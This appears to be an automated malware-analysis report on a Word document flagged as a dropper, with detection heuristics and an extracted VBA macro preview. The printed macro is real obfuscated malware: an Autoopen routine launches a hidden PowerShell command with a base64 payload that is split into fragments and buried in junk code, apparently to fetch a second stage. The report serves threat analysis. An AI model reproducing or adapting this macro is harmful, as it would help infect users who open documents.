Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains a VBA macro with an Autoopen function that calls the Shell() function. This function is used to execute a PowerShell command, which is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6556482-0' further supports the dropper functionality.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6556572-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6556572-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16870 bytes |

SHA-256: 5dc5262055339bc5f00b3236ed0302315a9ebe558b5466b3be758b9291da0ca3

Preview script (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "kqOMoFKRJsQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function NjKLbQT()
On Error Resume Next
Himajh = OipuJ - Cos(LPUtF) * 1 - Chr(22208) / 48014 - ChrB(FqlTdX)
siIzwZ = 33105
HswNiV = LkkJs - Cos(UsrEO) * 1 - Chr(5137) / 3205 - ChrB(AHFJOW)
huKzu = 42610
NjKLbQT = cnNAIqB + DFboHXQWCu + BCvkaWUDP + jIfLUNzKj + kZNGESzG + qWukAEc + jLUDHER + KphoOUVfta + wsXtB + hNvouYVz
AGwqK = iBiTiP - Cos(lRvkX) * 1 - Chr(29906) / 3170 - ChrB(ltDUz)
ipZMw = 6386
End Function
Sub Autoopen()
On Error Resume Next
skFYs = MzYmi - Cos(wSPzaa) * 1 - Chr(59283) / 39447 - ChrB(PNuWK)
ALIHj = 23599
rNfEPNrbB (NjKLbQT)
tjpLi = oHMGZV - Cos(zOqzl) * 1 - Chr(37316) / 66939 - ChrB(cWLBh)
MnQiw = 74153
End Sub
Function rNfEPNrbB(jrKQf)
On Error Resume Next
ZjJOvh = zDGVBJ - Cos(lVJVN) * 1 - Chr(56660) / 30817 - ChrB(JiKzw)
TvcbiU = 51134
jkqmDB = QqAYi - Cos(SGIkJR) * 1 - Chr(16066) / 50797 - ChrB(EwkDfH)
uSprGo = 48123
tkRANkZFwuu = Shell(rHKpjlIoIbj + Chr(vbKeyP) + DDiwn + jrKQf, vbHide)
baOrtn = ZOBBp - Cos(qZCSE) * 1 - Chr(3020) / 61191 - ChrB(BAVRlw)
jrVdhd = 18551
End Function
Attribute VB_Name = "CQhruZWCiSKD"
Function cnNAIqB()
On Error Resume Next
uiSiTS = mPREPV - Cos(NjwkVH) * 1 - Chr(96893) / 30908 - ChrB(WFtvD)
iBOpW = 86666
OtXDR = "owersHeLL" + " -WinDowsTyl" + "e hidden -e KA" + "AoACgAIgB7" + "ADEANgB" + "9AHsAMQ" + "A0AH0AewAxADI" + "AMQB9A" + "HsAOQA1"
itdJI = HSQzA - Cos(cRUHwb) * 1 - Chr(77909) / 58983 - ChrB(wdaXmi)
QpZzGo = 9979
JkXUoh = "AH0AewAxA" + "DAANgB9AHsAM" + "QAwADUAfQ" + "B7ADQAMgB"
GMziI = FItRaq - Cos(uSOhO) * 1 - Chr(94648) / 65291 - ChrB(DlVpW)
bXBXo = 24348
sIvoI = "9AHsAMwAz" + "AH0AewA1A" + "DIAfQB7" + "ADEANQB" + "9AHsAOA" + "A0AH0Ae" + "wA2AD" + "AAfQB7ADUAfQ"
AjbJV = rUjFMn - Cos(WWLRsq) * 1 - Chr(44688) / 73863 - ChrB(adpmj)
krtldr = 87726
tVDMSu = "B7ADEAM" + "QAxAH0Ae" + "wA3ADYA" + "fQB7ADU" + "AOQB9AHsANQA1" + "AH0AewAyADAAf" + "QB7AD" + "AAfQB7ADIANgB" + "9AHsAM"
mXsFqv = jIBvi - Cos(Mjfzp) * 1 - Chr(60811) / 95713 - ChrB(zUjIN)
pLbKjc = 77114
tbBnWG = "wA3AH0AewA1ADQ" + "AfQB7ADgAMw" + "B9AHsANwA0" + "AH0Aew" + "AxADMAf" + "QB7ADYA"
tzljr = uVnrEZ - Cos(HOnoM) * 1 - Chr(92012) / 50008 - ChrB(CJwdKh)
hrLBQ = 75968
hETZSYSw = "MwB9A" + "HsAMwA4AH0Ae" + "wA3ADkAfQB7" + "ADIAfQB7ADkAMA"
fMIoRO = hsEnNh - Cos(nVXhOk) * 1 - Chr(81975) / 82218 - ChrB(Djwanw)
CJkRia = 60678
OGIBpYlzwr = "B9AHsANAB9" + "AHsAMwB" + "9AHsANwAyAH0Ae" + "wA1ADcAf" + "QB7ADk" + "ANgB9AHsA" + "MgA5A" + "H0AewA4AH0AewA"
cnNAIqB = OtXDR + JkXUoh + sIvoI + tVDMSu + tbBnWG + hETZSYSw + OGIBpYlzwr
End Function
Function DFboHXQWCu()
On Error Resume Next
iLMVQ = pzAXtV - Cos(UCDzoX) * 1 - Chr(11064) / 15573 - ChrB(oplMB)
cPONqz = 5872
vUCiuTO = "2ADQAfQB7AD" + "kAMwB9" + "AHsAOAA2A" + "H0AewA4ADIAf" + "QB7ADEAMAA4AH0A" + "ewAxADEANA" + "B9AHs" + "AMwA1A"
YUZvN = wCtarh - Cos(jRuCZ) * 1 - Chr(29673) / 20486 - ChrB(WkErL)
kIjfo = 33915
mTzwwUEzlrB = "H0AewA0A" + "DUAfQB7ADcAN" + "wB9AHsAM" + "QA5AH0AewA" + "xADIAfQB7A" + "DQAMwB9AHsAMg" + "A4AH0AewA" + "2ADYA"
fiOcsZ = lvKUT - Cos(vwUKQ) * 1 - Chr(70187) / 85385 - ChrB(BkVEBO)
tMuDQ = 13554
RviJjwUbE = "fQB7ADEAMQ" + "AzAH0A" + "ewA1ADEAfQB7AD" + "EAMQAyA" + "H0AewA3"
mfahq = maakXo - Cos(moWPD) * 1 - Chr(48529) / 40903 - ChrB(utXrKH)
jPQDQu = 21237
iSCXb = "ADMAfQB" + "7ADEAM" + "QA5AH0AewA5" + "ADcAfQB7ADgA" + "OQB9AHsA" + "MQAyADUAfQB" + "7ADkAMQB9" + "AHsANAAxA"
jjuDsa = ljMpb - Cos(pfzrl) * 1 - Chr(45936) / 85196 - ChrB(Dqfhur)
TUYib = 98824
BoXSYhpwt = "H0Aew" + "AxADE" + "ANgB9AHsAMQAwA" + "H0AewAxADEAN" + "QB9AHsANgAyAH0" + "AewAxADMA"
jJWcDk = qiVjm - Cos(kRMiWS) * 1 - Chr(7569) / 61060 - ChrB(OVzizS)
oLzFC = 98898
WYNwlFDYd = "MAB9AHsAMQAz" + "ADEAfQB7ADEAM" + "AAxAH0A" + "ewA4ADAAfQB7" + "ADEAM"
UJUHcN = KBIwZ - Cos(ItIIv) * 1 - Chr(14674) / 75046 - ChrB(BiUkqd)
Kjjqka = 829
... (truncated)
```